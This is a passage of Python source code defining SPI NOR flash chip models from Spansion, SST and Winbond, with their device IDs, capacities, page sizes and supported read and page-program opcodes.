total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25SL032A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0215
name = "s25sl032a"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25SL032P(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0215
name = "s25sl032p"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25SL064A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0216
name = "s25sl064a"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25SL064P(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0216
name = "s25sl064p"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25SL12800(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25sl12800"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25SL12801(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25sl12801"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S70FL01GS(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0221
name = "s70fl01gs"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25LF080(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0080
name = "sst25lf080"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25LF080A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0080
name = "sst25lf080a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF010(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0049
name = "sst25vf010"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF010A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0049
name = "sst25vf010a"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF016B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2541
name = "sst25vf016b"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25VF020(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0043
name = "sst25vf020"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF020B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x258c
name = "sst25vf020b"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF032B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x254a
name = "sst25vf032b"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25VF040(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0044
name = "sst25vf040"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF040B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x258d
name = "sst25vf040b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25VF040BXREMS(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x008d
name = "sst25vf040b.rems"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF064C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x254b
name = "sst25vf064c"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25VF080B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x258e
name = "sst25vf080b"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25VF512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0048
name = "sst25vf512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25VF512A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x0048
name = "sst25vf512a"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25WF010(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2502
name = "sst25wf010"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25WF020(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2503
name = "sst25wf020"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25WF020A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x1612
name = "sst25wf020a"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25WF040(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2504
name = "sst25wf040"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25WF040B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x1613
name = "sst25wf040b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25WF080(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2505
name = "sst25wf080"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST25WF080B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x1614
name = "sst25wf080b"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST25WF512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2501
name = "sst25wf512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class SST26VF016B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2641
name = "sst26vf016b"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class SST26VF016BA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2641
name = "sst26vf016ba"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST26VF032B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2642
name = "sst26vf032b"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST26VF032BA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2642
name = "sst26vf032ba"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST26VF064B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2643
name = "sst26vf064b"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class SST26VF064BA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2643
name = "sst26vf064ba"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class SST26WF016B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SST
device_id = 0x2651
name = "sst26wf016b"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25M512JV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x7119
name = "w25m512jv"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4018
name = "w25q128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q128FV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4018
name = "w25q128fv"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25Q128FW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x6018
name = "w25q128fw"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q128JV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x7018
name = "w25q128jv"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q16DW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x6015
name = "w25q16dw"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q16JV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4015
name = "w25q16jv"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25Q16JV_IM(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x7015
name = "w25q16jv-im"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q16JV_JM(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x7015
name = "w25q16jv-jm"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q20BW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x5012
name = "w25q20bw"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q20CL(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4012
name = "w25q20cl"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q20EW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x6012
name = "w25q20ew"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4019
name = "w25q256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class W25Q256FV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4019
name = "w25q256fv"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25Q256JV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4019
name = "w25q256jv"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25Q256JVM(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x7019
name = "w25q256jvm"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q256JW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x6019
name = "w25q256jw"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4016
name = "w25q32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q32DW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x6016
name = "w25q32dw"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q32FV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4016
name = "w25q32fv"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25Q32JV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x7016
name = "w25q32jv"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q32JWM(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x8016
name = "w25q32jwm"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4017
name = "w25q64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q64DW(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x6017
name = "w25q64dw"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q64FV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4017
name = "w25q64fv"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25Q64JV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4017
name = "w25q64jv"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class W25Q80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x5014
name = "w25q80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q80BL(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4014
name = "w25q80bl"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25Q80BV(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4014
name = "w25q80bv"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class W25X05(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3010
name = "w25x05"
